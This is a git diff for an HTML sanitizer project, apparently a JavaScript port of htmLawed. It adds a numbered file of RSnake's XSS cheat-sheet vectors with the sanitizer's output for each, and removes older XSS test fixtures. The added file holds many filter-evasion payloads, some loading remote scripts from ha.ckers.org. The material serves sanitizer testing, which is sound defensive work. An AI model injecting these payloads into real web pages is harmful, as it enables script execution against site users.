+<strong>Bad IE7:</strong> <a style="xss:e #48;&#48;&#55;&#56;pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
+<strong>Bad IE7:</strong> <a style="background:url('denied:java script:eval(document.all.mycode.expr)')">hi</a><br />
+
+&lt;h6&gt;Other&lt;/h6&gt;
+
+3 &lt; 4 <br />
+3 &gt; 4 <br />
+  &gt; 3 <br />
+&lt;._.&gt; hi! <br />
+&lt;&lt;&lt; ALERT &gt;&gt;&gt; <br />
+&lt;![if !vml]&gt; some stuff &lt;![endif]&gt; <br />
+&lt;?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /&gt; <br />
+&lt;uml:ns ns = "urn:www"&gt; <br />
+&lt;uml:ns ns = 'urn:www'&gt; <br />
+if(13&lt;age AND 21&gt;age){say 'teen'} <br />
+age &gt;51 and a smoking history of &gt;51 pack-years <b>was</b> <br />
+age &gt; 51 and a smoking history of &gt;51 pack-years <b>was</b> <br />
+age &lt;51 and a smoking history of &lt;51 pack-years &lt;b&gt;was&lt;/b&gt; <br />
+age &lt; 51 and a smoking history of &lt; 51 pack-years <b>was</b> <br />
+<b>age &gt;51 and a smoking history of &gt;51 pack-years</b> <br />
+<b>age &gt; 51 and a smoking history of &gt;51 pack-years</b> <br />
+<b>age &lt;51 and a smoking history of &lt;51 pack-years&lt;/b&gt; <br />
+<b>age &lt; 51 and a smoking history of &lt; 51 pack-years</b> <br />
+</b></span>
\ No newline at end of file
diff --git a/rsnake_xss.txt b/rsnake_xss.txt
new file mode 100644
index 0000000..d047315
--- /dev/null
+++ b/rsnake_xss.txt
@@ -0,0 +1,642 @@
+1. XSS Locator
+
+Input code »
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
+Output code »
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
+
+2. XSS Quick Test
+
+Input code »
+'';!--"<XSS>=&{()}
+
+Output code »
+'';!--"&lt;XSS&gt;=&amp;{()}
+
+3. SCRIPT w/Alert()
+
+Input code »
+<SCRIPT>alert('XSS')</SCRIPT>
+
+Output code »
+&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;
+
+4. SCRIPT w/Source File
+
+Input code »
+<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+
+Output code »
+&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
+
+5. SCRIPT w/Char Code
+
+Input code »
+<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
+Output code »
+&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
+
+6. DIV background-image 1
+
+Input code »
+<DIV STYLE="background-image: url(javascript:alert('XSS'))">
+
+Output code »
+<div style="background-image: url(denied:javascript:alert('XSS'))"></div>
+
+7. DIV background-image 2
+
+Input code »
+<DIV STYLE="background-image: url(javascript:alert('XSS'))">
+
+Output code »
+<div style="background-image: url(denied:&amp;#1;javascript:alert('XSS'))"></div>
+
+8. DIV expression
+
+Input code »
+<DIV STYLE="width: expression(alert('XSS'));">
+
+Output code »
+<div style="width:  (alert('XSS'));"></div>
+
+9. IFRAME
+
+Input code »
+<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
+
+Output code »
+&lt;IFRAME SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;
+
+10. INPUT Image
+
+Input code »
+<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
+
+Output code »
+<input type="image" src="denied:javascript:alert('XSS');" />
+
+11. IMG w/JavaScript Directive
+
+Input code »
+<IMG SRC="javascript:alert('XSS');">
+
+Output code »
+<img src="denied:javascript:alert('XSS');" alt="image" />
+
+12. IMG No Quotes/Semicolon
+
+Input code »
+<IMG SRC=javascript:alert('XSS')>
+
+Output code »
+<img src="denied:javascript:alert(" alt="image" />
+
+13. IMG Dynsrc
+
+Input code »
+<IMG DYNSRC="javascript:alert('XSS');">
+
+Output code »
+<img src="src" alt="image" />
+
+14. IMG Lowsrc
+
+Input code »
+<IMG LOWSRC="javascript:alert('XSS');">
+
+Output code »
+<img src="src" alt="image" />
+
+15. IMG Embedded commands 1
+
+Input code »
+<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
+
+Output code »
+<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" alt="image" />
+
+16. IMG Embedded commands 2
+
+Input code »
+Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
+
+Output code »
+Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser
+
+17. IMG STYLE w/expression
+
+Input code »
+exp/*<XSS STYLE='no\xss:noxss("*//*");
+xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
+
+Output code »
+exp/*&lt;XSS STYLE='no\xss:noxss("*//*");
+xss:&#101;x&#x2f;*XSS*//*/*/pression(alert("XSS"))'&gt;
+
+18. IMG w/VBscript
+
+Input code »
+<IMG SRC='vbscript:msgbox("XSS")'>
+
+Output code »
+<img src="denied:vbscript:msgbox(&quot;XSS&quot;)" alt="image" />
+
+19. LAYER
+
+Input code »
+<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
+
+Output code »
+&lt;LAYER SRC="http://ha.ckers.org/scriptlet.html"&gt;&lt;/LAYER&gt;
+
+20. Livescript
+
+Input code »
+<IMG SRC="livescript:[code]">
+
+Output code »
+<img src="denied:livescript:[code]" alt="image" />
+
+21. US-ASCII encoding
+
+Input code »
+%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
+
+Output code »
+%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
+
+22. Mocha
+
+Input code »
+<IMG SRC="mocha:[code]">
+
+Output code »
+<img src="denied:mocha:[code]" alt="image" />
+
+23. OBJECT
+
+Input code »
+<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
+
+Output code »
+&lt;OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"&gt;&lt;/OBJECT&gt;
+
+24. OBJECT w/Embedded XSS
+
+Input code »
+<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
+
+Output code »
+&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name="url" value="javascript:alert(" /&gt;&lt;/OBJECT&gt;
+
+25. Embed Flash
+
+Input code »
+<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
+
+Output code »
+&lt;EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;
+
+26. OBJECT w/Flash 2
+
+Input code »
+a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";
+eval(a+b+c+d);
+
+Output code »
+a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";
+eval(a+b+c+d);
+
+27. STYLE
+
+Input code »
+<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
+
+Output code »
+&lt;STYLE TYPE="text/javascript"&gt;alert('XSS');&lt;/STYLE&gt;
+
+28. STYLE w/Comment
+
+Input code »
+<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
+
+Output code »
+<img style="xss:expr XSS*/ession(alert('XSS'))" src="src" alt="image" />
+
+29. STYLE w/Anonymous HTML
+
+Input code »
+<XSS STYLE="xss:expression(alert('XSS'))">
+
+Output code »
+&lt;XSS STYLE="xss:expression(alert('XSS'))"&gt;
+
+30. TABLE
+
+Input code »
+<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
+
+Output code »
+<table></table>
+
+31. TD
+
+Input code »
+<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
+
+Output code »
+<table>&lt;td&gt;&lt;/td&gt;</table>
+
+32. XML namespace
+
+Input code »
+<HTML xmlns:xss>
+<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
+<xss:xss>XSS</xss:xss>
+</HTML>
+
+Output code »
+&lt;HTML xmlns:xss&gt;
+&lt;?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"&gt;
+&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;
+&lt;/HTML&gt;
+
+33. XML data island w/CDATA
+
+Input code »
+<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
+</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
+
+Output code »
+&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&gt;&lt;![CDATA[cript:alert('XSS');"&gt;]]&gt;
+&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;<span></span>
+
+34. XML data island w/comment
+
+Input code »
+<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
+<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
+
+Output code »
+&lt;XML ID="xss"&gt;<i><b><img src="src" alt="image" />cript:alert('XSS')"&gt;</b></i>&lt;/XML&gt;
+<span></span>
+
+35. XML (locally hosted)
+
+Input code »
+<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
+<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+
+Output code »
+&lt;XML SRC="http://ha.ckers.org/xsstest.xml" ID=I&gt;&lt;/XML&gt;
+<span></span>
+
+36. XML HTML+TIME
+
+Input code »
+<HTML><BODY>
+<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
+<?import namespace="t" implementation="#default#time2">
+<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
+
+Output code »
+&lt;HTML&gt;&lt;BODY&gt;
+&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;
+&lt;?import namespace="t" implementation="#default#time2"&gt;
+&lt;t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert('XSS')&lt;/SCRIPT&gt;"&gt; &lt;/BODY&gt;&lt;/HTML&gt;
+
+37. Commented-out Block
+
+Input code »
+<!--[if gte IE 4]>
+<SCRIPT>alert('XSS');</SCRIPT>
+<![endif]-->
+
+Output code »
+&lt;!--[if gte IE 4]&gt;
+&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
+&lt;![endif]--&gt;
+
+38. Rename .js to .jpg
+
+Input code »
+<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
+
+Output code »
+&lt;SCRIPT SRC="http://ha.ckers.org/xss.jpg"&gt;&lt;/SCRIPT&gt;
+
+39. SSI
+
+Input code »
+<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
+
+Output code »
+&lt;!--#exec cmd="/bin/echo '&lt;SCRIPT SRC'"--&gt;&lt;!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'"--&gt;
+
+40. PHP
+
+Input code »
+<? echo('<SCR)';
+echo('IPT>alert("XSS")</SCRIPT>'); ?>
+
+Output code »
+&lt;? echo('&lt;SCR)';
+echo('IPT&gt;alert("XSS")&lt;/SCRIPT&gt;'); ?&gt;
+
+41. JavaScript Includes
+
+Input code »
+<BR SIZE="&{alert('XSS')}">
+
+Output code »
+<br />
+
+42. Case Insensitive
+
+Input code »
+<IMG SRC=JaVaScRiPt:alert('XSS')>
+
+Output code »
+<img src="denied:JaVaScRiPt:alert(" alt="image" />
+
+43. HTML Entities
+
+Input code »
+<IMG SRC=javascript:alert(&quot;XSS&quot;)>
+
+Output code »
+<img src="denied:javascript:alert(&quot;XSS&quot;)" alt="image" />
+
+44. Grave Accents
+
+Input code »
+<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
+
+Output code »
+<img src="denied:`javascript:alert(" alt="image" />
+
+45. Image w/CharCode
+
+Input code »
+<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+
+Output code »
+<img src="denied:javascript:alert(String.fromCharCode(88,83,83))" alt="image" />
+
+46. UTF-8 Unicode Encoding
+
+Input code »
+<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+
+Output code »
+<img src="denied:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;" alt="image" />
+
+47. Long UTF-8 Unicode w/out Semicolons
+
+Input code »
+<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+
+Output code »
+<img src="&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041" alt="image" />
+
+48. DIV w/Unicode
+
+Input code »
+<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
+
+Output code »
+<div style="background-image: 075 072 06C 028' 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029' 029"></div>
+
+49. Hex Encoding w/out Semicolons
+
+Input code »
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+
+Output code »
+<img src="&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29" alt="image" />
+
+50. Embedded Tab
+
+Input code »
+<IMG SRC="jav    ascript:alert('XSS');">
+
+Output code »
+<img src="denied:jav    ascript:alert('XSS');" alt="image" />
+
+51. Embedded Encoded Tab
+
+Input code »
+<IMG SRC="jav&#x09;ascript:alert('XSS');">
+
+Output code »
+<img src="denied:jav&#x9;ascript:alert('XSS');" alt="image" />
+
+52. Embedded Newline
+
+Input code »
+<IMG SRC="jav&#x0A;ascript:alert('XSS');">
+
+Output code »
+<img src="denied:jav&#xa;ascript:alert('XSS');" alt="image" />
+
+53. Embedded Carriage Return
+
+Input code »
+<IMG SRC="jav&#x0D;ascript:alert('XSS');">
+
+Output code »
+<img src="denied:jav&#xd;ascript:alert('XSS');" alt="image" />
+
+54. Multiline w/Carriage Returns
+
+Input code »
+<IMG
+SRC
+=
+"
+j
+a
+v
+a
+s
+c
+r
+i
+p
+t
+:
+a
+l
+e
+r
+t
+(
+'
+X
+S
+S
+'
+)
+"
+>
+
+Output code »
+<img src="denied:j  a  v  a  s  c  r  i  p  t  :  a  l  e  r  t  (  '  X  S  S  '  )" alt="image" />
+
+55. Spaces/Meta Chars
+
+Input code »
+<IMG SRC=" &#14;  javascript:alert('XSS');">
+
+Output code »
+<img src="denied:&amp;#14;  javascript:alert('XSS');" alt="image" />
+
+56. Non-Alpha/Non-Digit
+
+Input code »
+<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+Output code »
+&lt;SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
+
+57. Non-Alpha/Non-Digit Part 2
+
+Input code »
+<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
+
+Output code »
+&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;
+
+58. No Closing Script Tag
+
+Input code »
+<SCRIPT SRC=http://ha.ckers.org/xss.js
+
+Output code »
+&lt;SCRIPT SRC=http://ha.ckers.org/xss.js
+
+59. Protocol resolution in script tags
+
+Input code »
+<SCRIPT SRC=//ha.ckers.org/.j>
+
+Output code »
+&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
+
+60. Half-Open HTML/JavaScript
+
+Input code »
+<IMG SRC="javascript:alert('XSS')"
+
+Output code »
+&lt;IMG SRC="javascript:alert('XSS')"
+
+61. Double open angle brackets
+
+Input code »
+<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
+
+Output code »
+&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;
+
+62. Extraneous Open Brackets
+
+Input code »
+<<SCRIPT>alert("XSS");//<</SCRIPT>
+
+Output code »
+&lt;&lt;SCRIPT&gt;alert("XSS");//&lt;&lt;/SCRIPT&gt;
+
+63. Malformed IMG Tags
+
+Input code »
+<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
+
+Output code »
+<img src="src" alt="image" />&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;
+
+64. No Quotes/Semicolons
+
+Input code »
+<SCRIPT>a=/XSS/
+alert(a.source)</SCRIPT>
+
+Output code »
+&lt;SCRIPT&gt;a=/XSS/
+alert(a.source)&lt;/SCRIPT&gt;
+
+65. Evade Regex Filter 1
+
+Input code »
+<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+Output code »
+&lt;SCRIPT a="&gt;" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
+
+66. Evade Regex Filter 2
+
+Input code »
+<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+Output code »
+&lt;SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
+
+67. Evade Regex Filter 3
+
+Input code »
+<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+Output code »
+&lt;SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
+
+68. Evade Regex Filter 4
+
+Input code »
+<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+Output code »
+&lt;SCRIPT "a='&gt;'" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
+
+69. Evade Regex Filter 5
+
+Input code »
+<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+Output code »
+&lt;SCRIPT a=`&gt;` SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
+
+70. Filter Evasion 1
+
+Input code »
+<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+Output code »
+&lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
+
+71. Filter Evasion 2
+
+Input code »
+<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+Output code »
+&lt;SCRIPT a="&gt;'&gt;" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
+
+72. Mixed Encoding
+
+Input code »
+<A HREF="h
+tt    p://6&#09;6.000146.0x7.147/">XSS</A>
+
+Output code »
+<a href="denied:h  tt    p://6&#9;6.000146.0x7.147/">XSS</a>
+
+73. JavaScript Link Location
+
+Input code »
+<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
+
+Output code »
+<a href="denied:javascript:document.location='http://www.google.com/'">XSS</a>
diff --git a/test-htmLawed.sh b/test-htmLawed.sh
index 8a1452e..ec549dd 100644
--- a/test-htmLawed.sh
+++ b/test-htmLawed.sh
@@ -2,4 +2,4 @@
 # php -r 'require "htmLawed.php"; print htmLawed::sanitize(file_get_contents("test_xss.txt"), array("safe" => 1));' > test_php.htm
 node_modules/.bin/eslint --rulesdir eslint-plugin-no-regex-dot htmLawed.js
 node_modules/.bin/babel htmLawed.js > htmLawed.c.js
-nodejs htmLawed-test.js test_xss.txt
+nodejs htmLawed-test.js
diff --git a/test_php.htm b/test_php.htm
deleted file mode 100644
index 22e8411..0000000
--- a/test_php.htm
+++ /dev/null
@@ -1,42 +0,0 @@
-<img alt="&lt;img onmouseover=confirm(1)//" src="src" />
-'';!--"=&amp;{()}<br />
-<img src="denied:javascript%3Aalert('xss');" alt="image" /><br />
-<img src="denied:javascript:alert('xss');" alt="image" /><br />
-<img src="denied:java script:alert('xss');" alt="image" /><br />
-<img src="denied:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;" alt="image" /><br />
-<span style="color: #FF6699'onmouseover='alert(1)//;">test</span>
-<span style="color: img//onerror='alert`www.ptsecurity.com`'src=Psych0tr1a;">
-<br />
-<br />
-<br />
-&lt;!--[if gte IE 4]&gt;alert('xss');&lt;![endif]--&gt;<br />
-" src="http://ha.ckers.org/xss.js"&gt;<br />
-<strong>Bad in PHP version without safe:</strong> " ";alert(window.location.href);//&gt;<br />
-<br />
-<a style=";-moz-binding:url(denied:http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
-<strong>Bad IE7:</strong> <a href="http://x&amp;x=%22+style%3d%22background-image%3a+expression%28alert %28%27xss%3f%29%29">x</a><br />
-<strong>Opera:</strong> <a href="denied:\xE2\x80\x83javascript:alert(123)">link</a>
-<strong>Bad IE7:</strong> <a style="color:expr comment*/ession(alert(document.domain))">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:  (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:  (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp  */ression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp   */ression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:  x */ (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:  */ */ (alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="width:  *** *;;;;;;*/  */(alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background: */ (alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="background: huh   */ */ (alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="background: */ (alert('xss'));background: */ (alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> exp/*<a style="no ss:noxss(&quot;*/ &quot;);xss:ex XSS*/  /pression(alert(&quot;XSS&quot;))">x</a><br />
-<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
-<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
-<strong>Bad IE7:</strong> <a style="color:  065  078  070  072  065  073  073  069  06f  06e  028  061  06c  065  072  074  028  031  029  029">test</a><br />
-<strong>Bad IE7:</strong> <a style="xss:e #48;&#48;&#55;&#56;pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
-<strong>Bad IE7:</strong> <a style="background:url('denied:java script:eval(document.all.mycode.expr)')">hi</a><br />
-</span>
\ No newline at end of file
diff --git a/test_xss.txt b/test_xss.txt
deleted file mode 100644
index 0f13cbb..0000000
--- a/test_xss.txt
+++ /dev/null
@@ -1,44 +0,0 @@
-<img alt="<img onmouseover=confirm(1)//"<"">
-'';!--"<xss>=&{()}<br />
-<img src="javascript%3Aalert('xss');" /><br />
-<img src="javascript:alert('xss');" /><br />
-<img src="java script:alert('xss');" /><br />
-<img
-src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41; /><br />
-<font color='#FF6699"onmouseover="alert(1)//'>test</font>
-<font color='<img//onerror="alert`www.ptsecurity.com`"src=Psych0tr1a'>
-<div style="javascript:alert('xss');"></div><br />
-<div style="background-image:url(javascript:alert('xss'));"></div><br />
-<div style="background-image:url(&quot;javascript:alert('xss')&quot; );"></div><br />
-<!--[if gte IE 4]><script>alert('xss');</script><![endif]--><br />
-<script a=">" src="http://ha.ckers.org/xss.js"></script><br />
-<strong>Bad in PHP version without safe:</strong> <script a=">" ";alert(window.location.href);//></script><br />
-<div style="background-image: &#117;r&#x6C;('js&#58;xss'&#x29;"></div><br />
-<a style=";-moz-binding:url(http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
-<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert
-%28%27xss%3f%29%29">x</a><br />
-<strong>Opera:</strong> <a href="\xE2\x80\x83javascript:alert(123)">link</a>
-<strong>Bad IE7:</strong> <a style=color:expr/*comment*/ession(alert(document.domain))>xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp&#x72;ession(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: &#101;xpression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/expression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/&#69;xpression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Exp&#x72;ession(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/* */ression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp /* */ression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:/* x */expression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="xxx" style="background:/* */ */expression(alert('xss'));">xxx</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="width: /****/**;;;;;;*/expression/**/(alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background:/**/expression(alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="background: huh /* */ */expression(alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> <a href="x" style="background:/**/expression(alert('xss'));background:/**/expression(alert('xss'));">x</a><br />
-<strong>Bad IE7:</strong> exp/*<a style='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>x</a><br />
-<strong>Bad IE7:</strong> <a style="background:&#69;xpre\ssion(alert('xss'));">hi</a><br />
-<strong>Bad IE7:</strong> <a style="background:expre&#x5c;ssion(alert('xss'));">hi</a><br />
-<strong>Bad IE7:</strong> <a style="color: \0065 \0078 \0070 \0072 \0065 \0073 \0073 \0069 \006f \006e \0028 \0061 \006c \0065 \0072 \0074 \0028 \0031 \0029 \0029">test</a><br />
-<strong>Bad IE7:</strong> <a style="xss:e&#92;&#48;&#48;&#55;&#56;pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
-<strong>Bad IE7:</strong> <a style="background:url('java
-script:eval(document.all.mycode.expr)')">hi</a><br />
